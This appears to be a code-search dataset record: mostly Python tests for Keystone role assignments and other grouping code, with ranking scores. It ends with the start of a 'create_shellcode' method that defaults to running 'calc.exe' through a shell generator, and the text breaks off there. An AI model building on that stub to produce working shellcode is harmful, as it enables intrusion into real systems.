"def test_list_role_assignment_using_sourced_groups_with_domains(self):\n test_plan = {\n # A domain with 3 users, 3 groups, 3 projects, a second domain,\n # plus 3 roles.\n 'entities': {'domains': [{'users': 3, 'groups': 3, 'projects': 3},\n 1],\n 'roles': 3},\n # Users 0 & 1 are in the group 0, User 0 also in group 1\n 'group_memberships': [{'group': 0, 'users': [0, 1]},\n {'group': 1, 'users': [0]}],\n # Spread the assignments around - we want to be able to show that\n # if sourced by group, assignments from other sources are excluded\n 'assignments': [{'user': 0, 'role': 0, 'domain': 0},\n {'group': 0, 'role': 1, 'domain': 1},\n {'group': 1, 'role': 2, 'project': 0},\n {'group': 1, 'role': 2, 'project': 1},\n {'user': 2, 'role': 1, 'project': 1},\n {'group': 2, 'role': 2, 'project': 2}\n ],\n 'tests': [\n # List all effective assignments sourced from groups 0 and 1\n {'params': {'source_from_group_ids': [0, 1],\n 'effective': True},\n 'results': [{'group': 0, 'role': 1, 'domain': 1},\n {'group': 1, 'role': 2, 'project': 0},\n {'group': 1, 'role': 2, 'project': 1}\n ]},\n # Adding a role a filter should further restrict the entries\n {'params': {'source_from_group_ids': [0, 1], 'role': 1,\n 'effective': True},\n 'results': [{'group': 0, 'role': 1, 'domain': 1},\n ]},\n ]\n }\n self.execute_assignment_plan(test_plan)",
"def test_calculate_assign_group_rdclass(request):\n print(\"\\n--Starting:\", request.node.name)\n\n net = ModelRoadwayNetwork.read(\n link_file=STPAUL_LINK_FILE,\n node_file=STPAUL_NODE_FILE,\n shape_file=STPAUL_SHAPE_FILE,\n fast=True,\n )\n\n net.calculate_assign_group()\n net.calculate_roadway_class()\n assert \"assign_group\" in net.links_df.columns\n assert \"roadway_class\" in net.links_df.columns\n print(\"Assign Group Frequency\")\n print(net.links_df[net.links_df.drive_access == 1].assign_group.value_counts())\n print(\"Roadway Class Frequency\")\n print(net.links_df[net.links_df.drive_access == 1].roadway_class.value_counts())\n ## todo write an assert that actually tests something",
"def test_list_role_assignment_using_inherited_sourced_groups(self):\n test_plan = {\n # A domain with 3 users, 3 groups, 3 projects, a second domain,\n # plus 3 roles.\n 'entities': {'domains': [{'users': 3, 'groups': 3, 'projects': 3},\n 1],\n 'roles': 3},\n # Users 0 & 1 are in the group 0, User 0 also in group 1\n 'group_memberships': [{'group': 0, 'users': [0, 1]},\n {'group': 1, 'users': [0]}],\n # Spread the assignments around - we want to be able to show that\n # if sourced by group, assignments from other sources are excluded\n 'assignments': [{'user': 0, 'role': 0, 'domain': 0},\n {'group': 0, 'role': 1, 'domain': 1},\n {'group': 1, 'role': 2, 'domain': 0,\n 'inherited_to_projects': True},\n {'group': 1, 'role': 2, 'project': 1},\n {'user': 2, 'role': 1, 'project': 1,\n 'inherited_to_projects': True},\n {'group': 2, 'role': 2, 'project': 2}\n ],\n 'tests': [\n # List all effective assignments sourced from groups 0 and 1.\n # We should see the inherited group assigned on the 3 projects\n # from domain 0, as well as the direct assignments.\n {'params': {'source_from_group_ids': [0, 1],\n 'effective': True},\n 'results': [{'group': 0, 'role': 1, 'domain': 1},\n {'group': 1, 'role': 2, 'project': 0,\n 'indirect': {'domain': 0}},\n {'group': 1, 'role': 2, 'project': 1,\n 'indirect': {'domain': 0}},\n {'group': 1, 'role': 2, 'project': 2,\n 'indirect': {'domain': 0}},\n {'group': 1, 'role': 2, 'project': 1}\n ]},\n ]\n }\n self.execute_assignment_plan(test_plan)",
"def test_delete_user_assignments_user_same_id_as_group(self):\n # Create a common ID\n common_id = uuid.uuid4().hex\n # Create a project\n project = unit.new_project_ref(\n domain_id=CONF.identity.default_domain_id)\n project = self.resource_api.create_project(project['id'], project)\n # Create a user\n user = unit.new_user_ref(id=common_id,\n domain_id=CONF.identity.default_domain_id)\n user = self.identity_api.driver.create_user(common_id, user)\n self.assertEqual(common_id, user['id'])\n # Create a group\n group = unit.new_group_ref(id=common_id,\n domain_id=CONF.identity.default_domain_id)\n group = self.identity_api.driver.create_group(common_id, group)\n self.assertEqual(common_id, group['id'])\n # Create four roles\n roles = []\n for _ in range(4):\n role = unit.new_role_ref()\n roles.append(self.role_api.create_role(role['id'], role))\n # Assign roles for user\n self.assignment_api.driver.create_grant(\n user_id=user['id'], domain_id=CONF.identity.default_domain_id,\n role_id=roles[0]['id'])\n self.assignment_api.driver.create_grant(user_id=user['id'],\n project_id=project['id'],\n role_id=roles[1]['id'])\n # Assign roles for group\n self.assignment_api.driver.create_grant(\n group_id=group['id'], domain_id=CONF.identity.default_domain_id,\n role_id=roles[2]['id'])\n self.assignment_api.driver.create_grant(group_id=group['id'],\n project_id=project['id'],\n role_id=roles[3]['id'])\n # Make sure they were assigned\n user_assignments = self.assignment_api.list_role_assignments(\n user_id=user['id'])\n self.assertThat(user_assignments, matchers.HasLength(2))\n group_assignments = self.assignment_api.list_role_assignments(\n group_id=group['id'])\n self.assertThat(group_assignments, matchers.HasLength(2))\n # Delete user assignments\n self.assignment_api.delete_user_assignments(user_id=user['id'])\n # Assert only user assignments were deleted\n user_assignments = self.assignment_api.list_role_assignments(\n user_id=user['id'])\n self.assertThat(user_assignments, matchers.HasLength(0))\n group_assignments = self.assignment_api.list_role_assignments(\n group_id=group['id'])\n self.assertThat(group_assignments, matchers.HasLength(2))\n # Make sure these remaining assignments are group-related\n for assignment in group_assignments:\n self.assertThat(assignment.keys(), matchers.Contains('group_id'))",
"def construct_assignments(priest_list, group_list):\n priest_list = copy(priest_list)\n group_list = copy(group_list)\n buff_assignments = []\n if len(priest_list) == len(group_list):\n \"\"\" 1 priest per group \"\"\"\n priest_group = zip(priest_list, group_list)\n for priest_assign in priest_group:\n priest, group = priest_assign\n buff_assignments.append({\"priest\": priest, \"groups_assigned\": [group]})\n elif len(priest_list) < len(group_list):\n \"\"\" Fewer priests than groups, some will have more than 1 group assigned. \n Function will attempt to give consecutive group assignments in these cases. \"\"\"\n priest_parties_each, priest_additionals = divmod(len(group_list), len(priest_list))\n for priest in priest_list:\n buff_allocation = {\"priest\": priest, \"groups_assigned\": []}\n if priest_additionals > 0:\n for x in range(priest_parties_each+1):\n group_pop = group_list.pop(0)\n buff_allocation[\"groups_assigned\"].append(group_pop)\n priest_additionals -= 1\n else:\n for x in range(priest_parties_each):\n group_pop = group_list.pop(0)\n buff_allocation[\"groups_assigned\"].append(group_pop)\n buff_assignments.append(buff_allocation)\n print(\"Outcome: \", buff_assignments)\n return buff_assignments",
"def test_grouping(self):\n s = self.create(ComponentItem, UML.Component)\n uc1 = self.create(UseCaseItem, UML.UseCase)\n uc2 = self.create(UseCaseItem, UML.UseCase)\n\n self.group(s, uc1)\n assert 1 == len(uc1.subject.subject)\n self.group(s, uc2)\n assert 1 == len(uc2.subject.subject)\n\n # Classifier.useCase is not navigable to UseCase\n # self.assertEqual(2, len(s.subject.useCase))",
"def get_class_assign(class_id):\n assignment_data = query_db(\n \"SELECT id, name, due_date FROM assignments \"\n \"WHERE topic_id=(SELECT id FROM topics WHERE class_id=?);\",\n [class_id],\n )\n assignments = []\n for assignment in assignment_data:\n assignment_dict_class = {}\n assignment_dict_class[\"id\"] = assignment[0]\n assignment_dict_class[\"name\"] = str(assignment[1])\n assignment_dict_class[\"due_date\"] = assignment[2]\n assignments.append(assignment_dict_class)\n return assignments",
"def test_get_group_class_types(self):\n pass",
"def test_delete_group_assignments_group_same_id_as_user(self):\n # Create a common ID\n common_id = uuid.uuid4().hex\n # Create a project\n project = unit.new_project_ref(\n domain_id=CONF.identity.default_domain_id)\n project = self.resource_api.create_project(project['id'], project)\n # Create a user\n user = unit.new_user_ref(id=common_id,\n domain_id=CONF.identity.default_domain_id)\n user = self.identity_api.driver.create_user(common_id, user)\n self.assertEqual(common_id, user['id'])\n # Create a group\n group = unit.new_group_ref(id=common_id,\n domain_id=CONF.identity.default_domain_id)\n group = self.identity_api.driver.create_group(common_id, group)\n self.assertEqual(common_id, group['id'])\n # Create four roles\n roles = []\n for _ in range(4):\n role = unit.new_role_ref()\n roles.append(self.role_api.create_role(role['id'], role))\n # Assign roles for user\n self.assignment_api.driver.create_grant(\n user_id=user['id'], domain_id=CONF.identity.default_domain_id,\n role_id=roles[0]['id'])\n self.assignment_api.driver.create_grant(user_id=user['id'],\n project_id=project['id'],\n role_id=roles[1]['id'])\n # Assign roles for group\n self.assignment_api.driver.create_grant(\n group_id=group['id'], domain_id=CONF.identity.default_domain_id,\n role_id=roles[2]['id'])\n self.assignment_api.driver.create_grant(group_id=group['id'],\n project_id=project['id'],\n role_id=roles[3]['id'])\n # Make sure they were assigned\n user_assignments = self.assignment_api.list_role_assignments(\n user_id=user['id'])\n self.assertThat(user_assignments, matchers.HasLength(2))\n group_assignments = self.assignment_api.list_role_assignments(\n group_id=group['id'])\n self.assertThat(group_assignments, matchers.HasLength(2))\n # Delete group assignments\n self.assignment_api.delete_group_assignments(group_id=group['id'])\n # Assert only group assignments were deleted\n group_assignments = self.assignment_api.list_role_assignments(\n group_id=group['id'])\n self.assertThat(group_assignments, matchers.HasLength(0))\n user_assignments = self.assignment_api.list_role_assignments(\n user_id=user['id'])\n self.assertThat(user_assignments, matchers.HasLength(2))\n # Make sure these remaining assignments are user-related\n for assignment in group_assignments:\n self.assertThat(assignment.keys(), matchers.Contains('user_id'))",
"def test_get_roles_for_groups_on_project(self):\n domain1 = unit.new_domain_ref()\n self.resource_api.create_domain(domain1['id'], domain1)\n domain2 = unit.new_domain_ref()\n self.resource_api.create_domain(domain2['id'], domain2)\n project1 = unit.new_project_ref(domain_id=domain1['id'])\n self.resource_api.create_project(project1['id'], project1)\n project2 = unit.new_project_ref(domain_id=domain2['id'])\n self.resource_api.create_project(project2['id'], project2)\n group_list = []\n group_id_list = []\n role_list = []\n for _ in range(6):\n group = unit.new_group_ref(domain_id=domain1['id'])\n group = self.identity_api.create_group(group)\n group_list.append(group)\n group_id_list.append(group['id'])\n\n role = unit.new_role_ref()\n self.role_api.create_role(role['id'], role)\n role_list.append(role)\n\n # Assign the roles - one inherited and one non-inherited on Domain1,\n # plus one on Project1\n self.assignment_api.create_grant(group_id=group_list[0]['id'],\n domain_id=domain1['id'],\n role_id=role_list[0]['id'])\n self.assignment_api.create_grant(group_id=group_list[1]['id'],\n domain_id=domain1['id'],\n role_id=role_list[1]['id'],\n inherited_to_projects=True)\n self.assignment_api.create_grant(group_id=group_list[2]['id'],\n project_id=project1['id'],\n role_id=role_list[2]['id'])\n\n # ...and a duplicate set of spoiler assignments to Domain2/Project2\n self.assignment_api.create_grant(group_id=group_list[3]['id'],\n domain_id=domain2['id'],\n role_id=role_list[3]['id'])\n self.assignment_api.create_grant(group_id=group_list[4]['id'],\n domain_id=domain2['id'],\n role_id=role_list[4]['id'],\n inherited_to_projects=True)\n self.assignment_api.create_grant(group_id=group_list[5]['id'],\n project_id=project2['id'],\n role_id=role_list[5]['id'])\n\n # With inheritance on, we should also get back the inherited role from\n # its owning domain.\n\n role_refs = self.assignment_api.get_roles_for_groups(\n group_id_list, project_id=project1['id'])\n\n self.assertThat(role_refs, matchers.HasLength(2))\n self.assertIn(role_list[1], role_refs)\n self.assertIn(role_list[2], role_refs)",
"def test_list_role_assignment_by_domain(self):\n test_plan = {\n # A domain with 3 users, 1 group, a spoiler domain and 2 roles.\n 'entities': {'domains': [{'users': 3, 'groups': 1}, 1],\n 'roles': 2},\n # Users 1 & 2 are in the group\n 'group_memberships': [{'group': 0, 'users': [1, 2]}],\n # Assign a role for user 0 and the group\n 'assignments': [{'user': 0, 'role': 0, 'domain': 0},\n {'group': 0, 'role': 1, 'domain': 0}],\n 'tests': [\n # List all effective assignments for domain[0].\n # Should get one direct user role and user roles for each of\n # the users in the group.\n {'params': {'domain': 0, 'effective': True},\n 'results': [{'user': 0, 'role': 0, 'domain': 0},\n {'user': 1, 'role': 1, 'domain': 0,\n 'indirect': {'group': 0}},\n {'user': 2, 'role': 1, 'domain': 0,\n 'indirect': {'group': 0}}\n ]},\n # Using domain[1] should return nothing\n {'params': {'domain': 1, 'effective': True},\n 'results': []},\n ]\n }\n self.execute_assignment_plan(test_plan)",
"def test_get_user_assignable_assessments(self):\n api_instance = relias_api_client.AssessmentsApi(relias_api_client.ApiClient())\n result = api_instance.get_user_assignable_assessments(\"[email protected]\")\n self.assertEqual(result.total_count, 255)",
"def test_get_group(self):\n pass",
"def test_set_subject_return(self) -> None:\n\n given = \"example.org\"\n\n actual = self.checker.set_subject(given)\n\n self.assertIsInstance(actual, CheckerBase)",
"def test_groups_group_users_get(self):\n pass",
"def test_groups_group_users_get(self):\n pass",
"def test_list_role_assignments_unfiltered(self):\n test_plan = {\n # Create a domain, with a user, group & project\n 'entities': {'domains': {'users': 1, 'groups': 1, 'projects': 1},\n 'roles': 3},\n # Create a grant of each type (user/group on project/domain)\n 'assignments': [{'user': 0, 'role': 0, 'domain': 0},\n {'user': 0, 'role': 1, 'project': 0},\n {'group': 0, 'role': 2, 'domain': 0},\n {'group': 0, 'role': 2, 'project': 0}],\n 'tests': [\n # Check that we get back the 4 assignments\n {'params': {},\n 'results': [{'user': 0, 'role': 0, 'domain': 0},\n {'user': 0, 'role': 1, 'project': 0},\n {'group': 0, 'role': 2, 'domain': 0},\n {'group': 0, 'role': 2, 'project': 0}]}\n ]\n }\n self.execute_assignment_plan(test_plan)",
"def solveTaskGroupingAssignment(agent_capacity, task_cost, groups, assign_same_quantity_of_tasks=False):\n print(\"Agent capacities\", agent_capacity.values())\n agents = agent_capacity.keys()\n tasks = task_cost.keys()\n _groups = groups.keys()\n agentsxtasks = list(itertools.product(agent_capacity.keys(),\n task_cost.keys())) # Lista de pares resultante de hacer producto cartesiano entre agents y tasks\n tasks_en_groups = list(itertools.chain.from_iterable(groups.values()))\n agentsxtasks_in_groups = list(itertools.product(agent_capacity.keys(),\n tasks_en_groups)) # Lista de pares resultante de hacer producto cartesiano entre agents y tasks\n agentsxgroups = list(itertools.product(agent_capacity.keys(),\n groups.keys())) # Lista de pares resultante de hacer producto cartesiano entre agents y tasks\n prob = pulp.LpProblem(\"Task grouping assignment \", pulp.LpMinimize)\n assignment_vars = pulp.LpVariable.dicts(\"Assignment\", agentsxtasks, None, None, pulp.LpBinary)\n # Variables Auxes para ayudarse a resolver la desviacin estandard\n aux_vars = pulp.LpVariable.dicts(\"Aux\", agentsxtasks_in_groups, None, None)\n # Funcion objetivo\n\n assignment_agente_in_each_group = {} # (idagente, idgrupo): lpSum(tasks_del_grupo_idgrupo_al_agente_idagente\n\n # tasks asignadas al agente por grupo\n for agente in agents:\n for grupo in _groups:\n assignment_agente_in_each_group[(agente, grupo)] = pulp.lpSum(\n [assignment_vars[x] for x in agentsxtasks if x[0] == agente and x[1] in groups[grupo]])\n\n # Retorna la desviacion standard de las Assignmentes a un grupo determinado\n\n # print (assignment_agente_in_each_group[(1,0)])\n assignment_agent_in_each_group_average = {}\n for agente in agents:\n for grupo in _groups:\n assignment_agent_in_each_group_average[(agente, grupo)] = pulp.lpSum(\n assignment_agente_in_each_group[(agente, grupo)]) / float(len(groups[grupo]))\n assigned_tasks_to_agent_less_group_average = {}\n for agente in agents:\n for grupo in _groups:\n for task in groups[grupo]:\n assigned_tasks_to_agent_less_group_average[(agente, task)] = assignment_vars[(agente, task)] - \\\n assignment_agent_in_each_group_average[\n (agente, grupo)]\n\n def construir_desviacion_standard(agente, grupo):\n return pulp.lpSum([aux_vars[(agente, task)] for task in groups[grupo]]) / float((len(groups[grupo])))\n\n def construir_funcion_objetivo():\n return pulp.lpSum(\n [construir_desviacion_standard(agentexgrupo[0], agentexgrupo[1]) for agentexgrupo in agentsxgroups])\n\n # Restricciones\n assignments_by_agent = {}\n\n for agente in agents:\n assignments_by_agent[agente] = [task_cost[i[1]] * assignment_vars[i] for i in agentsxtasks if i[0] == agente]\n\n # La suma de las horas asignadas no puede superar el mximo de horas disponibles\n for agente in agents:\n prob += lpSum(assignments_by_agent[agente]) <= agent_capacity[agente]\n prob += construir_funcion_objetivo(), \"Minimizar desviacion estandard en la asignaciin de groups\"\n # Correspondencia valores absulutos y sus respectivas variables auxiliares\n for agente in agents:\n for task in tasks_en_groups:\n prob += assigned_tasks_to_agent_less_group_average[(agente, task)] <= aux_vars[(agente, task)]\n prob += -assigned_tasks_to_agent_less_group_average[(agente, task)] <= aux_vars[(agente, task)]\n\n # Una task solamente puede ser asignada a una persona:\n\n for task in tasks:\n prob += pulp.lpSum([assignment_vars[i] for i in agentsxtasks if i[1] == task]) == 1\n\n tiempo_solve_inicial = time()\n prob.solve()\n tiempo_final_solve = time()\n tiempo_solve = tiempo_final_solve - tiempo_solve_inicial\n\n # The status of the solution is printed to the screen\n print(\"Status:\", pulp.LpStatus[prob.status])\n\n for v in prob.variables():\n print(re.findall(r'\\d+', v.name))\n print(v.name, \"=\", v.varValue)\n print('El tiempo total de el solve fue:', tiempo_solve) # En segundos\n return prob.status, prob.variables()",
"def test_list_role_assignment_by_user_with_domain_group_roles(self):\n test_plan = {\n # A domain with 3 users, 3 groups, a spoiler domain\n # plus 3 roles.\n 'entities': {'domains': [{'users': 3, 'groups': 3}, 1],\n 'roles': 3},\n # Users 1 & 2 are in the group 0, User 1 also in group 1\n 'group_memberships': [{'group': 0, 'users': [0, 1]},\n {'group': 1, 'users': [0]}],\n 'assignments': [{'user': 0, 'role': 0, 'domain': 0},\n {'group': 0, 'role': 1, 'domain': 0},\n {'group': 1, 'role': 2, 'domain': 0},\n # ...and two spoiler assignments\n {'user': 1, 'role': 1, 'domain': 0},\n {'group': 2, 'role': 2, 'domain': 0}],\n 'tests': [\n # List all effective assignments for user[0].\n # Should get one direct user role and a user roles for each of\n # groups 0 and 1\n {'params': {'user': 0, 'effective': True},\n 'results': [{'user': 0, 'role': 0, 'domain': 0},\n {'user': 0, 'role': 1, 'domain': 0,\n 'indirect': {'group': 0}},\n {'user': 0, 'role': 2, 'domain': 0,\n 'indirect': {'group': 1}}\n ]},\n # Adding domain[0] as a filter should return the same data\n {'params': {'user': 0, 'domain': 0, 'effective': True},\n 'results': [{'user': 0, 'role': 0, 'domain': 0},\n {'user': 0, 'role': 1, 'domain': 0,\n 'indirect': {'group': 0}},\n {'user': 0, 'role': 2, 'domain': 0,\n 'indirect': {'group': 1}}\n ]},\n # Using domain[1] should return nothing\n {'params': {'user': 0, 'domain': 1, 'effective': True},\n 'results': []},\n # Using user[2] should return nothing\n {'params': {'user': 2, 'domain': 0, 'effective': True},\n 'results': []},\n ]\n }\n self.execute_assignment_plan(test_plan)",
"def __subject_self(self):\n # Iterate over each row in the dataframe, check if the requirement type is not C and the name is a string (avoid NAs) and then extract the three letter subject code\n major_subject_names = pd.Series([ row['FULL'][0:3] if row['REQUIREMENT_TYPE'] != 'C' and isinstance(row['FULL'],str) else np.NAN for idx, row in self.major_map.cleaned_major_data.iterrows()])\n # Expand these matches over all of the students classes and all of the requirements\n tester = self.student.student_hist['FULL'].str[0:3].apply(lambda sub: sub == major_subject_names )\n return self.__get_reqs(tester)",
"def create_assignments(self, assignment_pattern, test_data):\n # First store how many assignments are already in the system,\n # so during the tests we can check the number of new assignments\n # created.\n test_data['initial_assignment_count'] = (\n len(self.assignment_api.list_role_assignments()))\n\n # Now create the new assignments in the test plan\n for assignment in assignment_pattern:\n # Each assignment is a dict of the form:\n #\n # { 'user': 0, 'project':1, 'role': 6}\n #\n # where the value of each item is the index into the array of\n # entities created earlier.\n #\n # We process the assignment dict to create the args required to\n # make the create_grant() call.\n args = {}\n for param in assignment:\n if param == 'inherited_to_projects':\n args[param] = assignment[param]\n else:\n # Turn 'entity : 0' into 'entity_id = ac6736ba873d'\n # where entity in user, group, project or domain\n key, value = self._convert_entity_shorthand(\n param, assignment, test_data)\n args[key] = value\n self.assignment_api.create_grant(**args)\n return test_data",
"def group_assignments(assignment_list):\n return group_nodes(assignment_list, 1)"
] |
[
"0.59990984",
"0.58262056",
"0.58262056",
"0.5773726",
"0.5773726",
"0.57599586",
"0.5723594",
"0.5658932",
"0.5651273",
"0.5588515",
"0.55587524",
"0.54874307",
"0.5484704",
"0.54762024",
"0.54645294",
"0.5462985",
"0.54540384",
"0.5441348",
"0.54135805",
"0.541294",
"0.5402347",
"0.539048",
"0.5371929",
"0.5371929",
"0.53591335",
"0.53537565",
"0.5336408",
"0.5335546",
"0.53265196",
"0.53215194"
] |
0.9535195
|
0
|
Test case for get_group_class_types
|
def test_get_group_class_types(self):
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def get_group_types(self):\r\n pass",
"def test_get_types(self):\n pass",
"def get_class(self, grp, class_type=\"NXcollection\"):\n coll = [grp[name] for name in grp\n if isinstance(grp[name], h5py.Group) and\n self.get_attr(grp[name], \"NX_class\") == class_type]\n return coll",
"def get_check_types():",
"def test_get_groups(self):\n pass",
"def test_get_groups(self):\n pass",
"def test_groups_get(self):\n pass",
"def test_groups_get(self):\n pass",
"def test_get_group(self):\n pass",
"def test___get_all_classes():\n config = {\"plugins\": [\"tests.mock_plugin\"]}\n classes = r._get_all_classes(config, r.DataSource)\n assert \"food\" in classes\n classes = r._get_all_classes(config, r.DataSink)\n assert \"food\" in classes",
"def test_get_device_groups(self):\n pass",
"def classes(self):\n raise NotImplementedError(\"Please implement this yourself.\")",
"def test_get_device_groups1(self):\n pass",
"def test_get_group_class_subject_assignments(self):\n pass",
"def test_get_contact_person_types(self):\n pass",
"def test_users_groups_get(self):\n pass",
"def testTypeDescendants(self):\n\n cmisClient = CmisClient(self.url, self.user, self.pwd,\n binding=self.binding,\n **self.ext_args)\n repo = cmisClient.getDefaultRepository()\n typeDefs = repo.getTypeDescendants()\n folderDef = None\n for typeDef in typeDefs:\n if typeDef.getTypeId() == 'cmis:folder':\n folderDef = typeDef\n break\n assert folderDef\n assert folderDef.baseId",
"def test_type_confict(setup_teardown_file):\n f = setup_teardown_file[3]\n grp = f.create_group(\"test\")\n\n grp.create_group('foo')\n with pytest.raises(TypeError):\n grp.require_dataset('foo', (10, 3), 'f')",
"def find_groups_from_ctypes(self, mesh, gtypes):\n ctypes = [self._ctypes[gtype] for gtype in gtypes]\n grp_names = []\n for geom in mesh.give_geom().get_children():\n if geom.get_shape_type() in ctypes:\n grp_names.append(geom.read_name())\n return grp_names",
"def decode_group_class(group_class_repr):\n\tloaded = {tuple(key): value for key, value in json.loads(group_class_repr)}\n\treturn cl.Counter(loaded)",
"def ntypes(self): # -> list[str]:\n ...",
"def Subclass_finder(cls):\n\n subclasses = [] # Create a list to deposit subclasses\n\n for subclass in cls.__subclasses__():\n subclasses.append(subclass) # Add founded subclass\n subclasses.extend(Subclass_finder(subclass)) # Check if there is a subclass\n # of a subclass.\n\n Output_types = [] # Create a list to deposit final strings\n for i in range(len(subclasses)): \n instance = subclasses[i]() # Create an instance for the \n Output_types.append(instance.kind) # Add them to the output list\n \n return Output_types",
"def get_classes(self):\n return",
"def test_collect_generic_classifier_dependencies(self, module_repo):\n expected_result = {(\"pack_with_generic_type\", True)}\n\n test_input = [\n {\n \"Dummy Classifier\": {\n \"name\": \"Dummy Classifier\",\n \"fromversion\": \"5.0.0\",\n \"definitionId\": \"assets\",\n \"pack\": \"dummy_pack\",\n \"incident_types\": [\"generic_type_id\"],\n }\n }\n ]\n\n found_result = PackDependencies._collect_classifiers_dependencies(\n pack_classifiers=test_input,\n id_set=module_repo.id_set.read_json_as_dict(),\n )\n assert set(found_result) == set(expected_result)",
"def get_num_classes(self):",
"def test_group_by_params_string_list_fields(self):\n group_params = {\"instance_type\": FAKE.word()}\n serializer = OCIGroupBySerializer(data=group_params)\n validation = serializer.is_valid()\n self.assertTrue(validation)\n result = serializer.data.get(\"instance_type\")\n self.assertIsInstance(result, list)",
"def test_api_v1_groups_get(self):\n pass",
"def test_transform_type(self):\n self.assertEqual(self.group_tr.getTransformType(), OCIO.TRANSFORM_TYPE_GROUP)",
"def new_class(self, grp, name, class_type=\"NXcollection\"):\n sub = grp.require_group(name)\n sub.attrs[\"NX_class\"] = numpy.string_(class_type)\n return sub",
"def test_get_all_instance_types(self):\n session = sql_session.get_session()\n total_instance_types = session.query(models.InstanceTypes).count()\n inst_types = instance_types.get_all_types()\n self.assertEqual(total_instance_types, len(inst_types))"
] |
[
"0.7822249",
"0.69615924",
"0.6546104",
"0.63630015",
"0.6300565",
"0.6300565",
"0.608619",
"0.608619",
"0.59768003",
"0.5951271",
"0.58344716",
"0.5772014",
"0.57074475",
"0.5700594",
"0.56738675",
"0.5659094",
"0.5655538",
"0.56528234",
"0.5627371",
"0.56217194",
"0.5607421",
"0.55819637",
"0.55700785",
"0.5564626",
"0.5564561",
"0.555984",
"0.5494493",
"0.5490339",
"0.54766184",
"0.54761547"
] |
0.9459802
|
0
|
Test case for get_list8
|
def test_get_list8(self):
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_get_list(self):\n pass",
"def test_list(self):\n pass",
"def test_list(self):\n pass",
"def test_list_field():",
"def test_kyc_get_legal_list(self):\n pass",
"def test_getlist(self):\n flags = flag_lists(appversions={\"code\": \"fx1.0\"})\n eq_(flags, {(\"fx\", \"pl\"): [0],\n (\"fx\", \"de\"): [1],\n (\"fx\", \"fr\"): [2],\n (\"fx\", \"da\"): [1, 0]})",
"def test_listtem_using_get(self):\n pass",
"def test_list_identity(self):\n pass",
"def list():",
"def list():",
"def check_for_list(check):",
"def test_cards_get_list(self):\n pass",
"def test_get_direct_access_list(self):\n result = self.param_dict.get_direct_access_list()\n self.assertTrue(isinstance(result, list))\n self.assertEquals(len(result), 2)\n self.assert_(\"foo\" in result)\n self.assert_(\"baz\" in result)",
"def testGetList(self, tag, expected_value):\n actual_value = dicom_json.GetList(_DICOM_JSON, tag)\n self.assertEqual(actual_value, expected_value)",
"def test_kyc_get_natura_list(self):\n pass",
"def getListItem(*args):",
"def getListItem(*args):",
"def getListItem(*args):",
"def test_list_format(self) -> None:\n r = self.perform_request('list', False)\n self.assert_json_schema(r.json(), self.get_list_schema())",
"def test_get_value_list_result(self):\n test_data = []\n test_data.append(json.loads('{\"name\": \"Pat\"}'))\n test_data.append(json.loads('{\"last_name\": \"Nat\"}'))\n test_data.append(json.loads('{\"name\": \"Gwen\"}'))\n\n key = \"name\"\n result_list = get_value_list(test_data, key)\n self.assertTrue(len(result_list) == 2)",
"def getList(self):",
"def getList(self):",
"def test_list_group(self):\n pass",
"def get_list(self, *args, **kwargs):\n pass",
"def get_list(self, *args, **kwargs):\n pass",
"def test_get_value_list_value(self):\n test_data = []\n test_data.append(json.loads('{\"name\": \"Pat\"}'))\n test_data.append(json.loads('{\"last_name\": \"Nat\"}'))\n\n key = \"name\"\n result_list = get_value_list(test_data, key)\n self.assertTrue(result_list == ['Pat'])",
"def test_get_list_empty(self):\r\n result = self.get_json(self.LIST_URI)\r\n self.assertEqual(result[\"count\"], 0)\r\n self.assertIsNone(result[\"next\"])\r\n self.assertIsNone(result[\"previous\"])\r\n self.assertEqual(result[\"results\"], [])",
"def test_get_operations_list_with_correct_data(self):\n ops = self.client.get_operations_list(self.agent_id)\n self.assertIsInstance(ops, list)",
"def test_fromlist(self):\n\n self.assertRaises(TypeError, self.hw, [])",
"def test_get_startup_list(self):\n result = self.param_dict.get_startup_list()\n self.assertTrue(isinstance(result, list))\n self.assertEquals(len(result), 2)\n self.assert_(\"foo\" in result)\n self.assert_(\"bar\" in result)"
] |
[
"0.7849026",
"0.71710646",
"0.71710646",
"0.67199636",
"0.6585331",
"0.65528893",
"0.6541352",
"0.64944035",
"0.6406276",
"0.6406276",
"0.63428843",
"0.6257347",
"0.6197544",
"0.6124488",
"0.61166626",
"0.6104026",
"0.6104026",
"0.6104026",
"0.6095149",
"0.60723835",
"0.60653335",
"0.60653335",
"0.6039578",
"0.60086685",
"0.60086685",
"0.6000144",
"0.59615636",
"0.5936555",
"0.59318984",
"0.5921862"
] |
0.9190918
|
0
|
Test case for update9
|
def test_update9(self):
pass
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def test_4_4_1_1(self):\n pass",
"def test_update_system(self):\n pass",
"def test_update_case(self):\n pass",
"def test_update_state4(self):\n pass",
"def test_update(self):\n # this is tested graphically, as it is UI\n pass",
"def test_update(self):\n pass",
"def test_update(self):\n pass",
"def test_update(self):\n pass",
"def test_version(self):\n pass",
"def test_update_state3(self):\n pass",
"def test_upgrade_with_auto_upgrade_latest_engine_enabled():",
"def test_update_scenario(self):\n pass",
"def test_update_state2(self):\n pass",
"def test_update_state1(self):\n pass",
"def test_change_provisioned_throughput_usual_case():",
"def test_uparforvarg(self):",
"def test_T01():",
"def test_get_version(self):\n pass",
"def _test(self):",
"def _test(self):",
"def _test(self):",
"def _test(self):",
"def _test(self):",
"def dummy_update( self ):\r\n pass",
"def test_patch_bios_unit(self):\n pass",
"def testDirtyRefresh(self):\n \n pass",
"def test_update_state(self):\n pass",
"def test_T4():",
"def test_T4():",
"def test(self):\n pass"
] |
[
"0.7360029",
"0.7172825",
"0.7060694",
"0.6966549",
"0.68949056",
"0.68932676",
"0.68932676",
"0.68932676",
"0.68491435",
"0.6751525",
"0.66580385",
"0.6636913",
"0.66286045",
"0.6586873",
"0.65783006",
"0.6496448",
"0.6440388",
"0.63663083",
"0.632522",
"0.632522",
"0.632522",
"0.632522",
"0.632522",
"0.632505",
"0.6313759",
"0.62958956",
"0.62931097",
"0.6284523",
"0.6284523",
"0.62782234"
] |
0.84707344
|
0
|
Function for create shellcode
|
def create_shellcode(self, _shellcode_type='', command='calc.exe', message='', encode=None, make_exe=0, debug=0):
generator = ShellGenerator(self.OS_TARGET, self.OS_TARGET_ARCH)
